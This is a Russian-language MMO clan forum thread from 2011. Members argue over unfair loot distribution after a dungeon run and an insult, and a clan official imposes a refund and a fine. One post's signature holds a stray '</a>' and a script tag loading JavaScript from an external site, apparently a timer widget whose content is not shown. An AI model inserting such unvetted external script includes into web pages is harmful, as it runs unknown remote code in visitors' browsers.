TWOHK | Дата: Пятница, 21.10.2011, 17:26 | Сообщение # 1 |
 n00b
Group: Пользователи
Flood Level: 7
Registration was: 30.09.2011
Status: Offline
| Такие ситуации стандартно решаются внутри пати обычно, но в данном случае я так как внутри вашей пати это решить не удалось, то мембер обратился с жалобой. Это нормальная ситуация. Согласно скриншотам (я так поняла, что других у вас нет) единственная фраза от прозвучавшая от Xlopushka это "нубас TаnaTos вступить в клан и опозорит его", при этом сам TаnaTos выражается куда менее скромнее.
В данной жалобе рассматривается не только оскорбление, но и не верность стандартного распределения лута после прохождения Гуй-Му. В данном случае, нашему мемберу не дали возможности участвовать в рандомном падении предметов при разбивании грибов. По скриншотам ясно видно, что TаnaTos отказался выйти за пристом в Город Истоков. В таком случае уже не важно кто именно разбил грибочки друль или вар, присту все равно ничего не достанется, кроме монеток.
Решение: вернуть соответствующую долю лута в размере 1,5кк (1 500 000) в эквиваленте игровой валюты. TаnaTos уплатить штраф 1 голд по курсу аукциона, срок неделя, за оскорбление игрока Ги Excellent,выслать на ник дипломата Милочка (все буквы русские) или мастера клана с указанием причины штрафа. Закрыто.
в принципе все разумно, кроме одного... штатно внутри пати отказался решать вопрос ваш мембер, выйдя с пати (заметим его не кикали, и, это ЕГО решение не участвовать в НОРМАЛЬНОМ дележе дропа, но и не исполнять взятые на себя обязательствва), нарушив свое обязательство о помощи в конце гуя по квесту "моль3". Возмещение ему дропа состоится за вычетом суммы оплаты другому присту либо по факту возврата оптлаты ему за услугу (состоит в выдаче ему всего дропа со стороны win-a)
кстати... как вы верно заметили что Quote Такие ситуации стандартно решаются внутри пати обычно, но в данном случае я так как внутри вашей пати это решить не удалось, то мембер обратился с жалобой. Это нормальная ситуация. так вот откуда взялась замечательная формулировка "не удалось"? на каком скрине есть хоть малейшая попытка стандартно решить внутри пати? кстати отсюда и суть вопроса... человек не стал решать, попутно не соблюв свои обязательства уточните этот момент
так же хочется уточнить что значит "гораздо круче"? то есть "тварь" есть оскорбление, а назвать человека вором в принципе норма, не подлежащая наказанию? прояните лично для меня этот момент
Сообщение отредактировал TWOHK - Пятница, 21.10.2011, 17:51 |
|
| |
Xlopushka | Дата: Пятница, 21.10.2011, 21:32 | Сообщение # 2 |
 Экселлент-пользователь
Group: Future Excellent
Flood Level: 173
Registration was: 14.05.2011
| TWOHK меня поражает. Тема была закрыта.
</a><script type="text/javascript" src="http://flines.ru/timelinejs/1058658.js"></script>
En la gloria Excellent!
Сообщение отредактировал Xlopushka - Пятница, 21.10.2011, 21:34 |
|
| |
Милочка | Дата: Суббота, 22.10.2011, 01:21 | Сообщение # 3 |
 Начинающий флудер
Group: Ex-Excellent
Flood Level: 427
Registration was: 19.11.2010
| а где видно что она брала какие-то обязательства? где видно, что она с Вас что-то брала и обязана что-то вернуть? со стороны Xlopushka были предоставлены все скриншоты. С Вашей стороны я ждала скриншотов сутки. если за это время Вы не смогли их предоставить, значит я предполагаю, что их нет, и ждать более смысла не вижу. Так же на скриншотах Xlopushka я не вижу, чтобы она назвала его вором или кидалой, с Вашей стороны доказательств тоже не поступило.
Решение остается прежним. Тему закрываю.
Уровень репутации был повышен [+1]. Добавил: 3ВЕРb Комментарий: повелительнице котов!!!
|
|
| |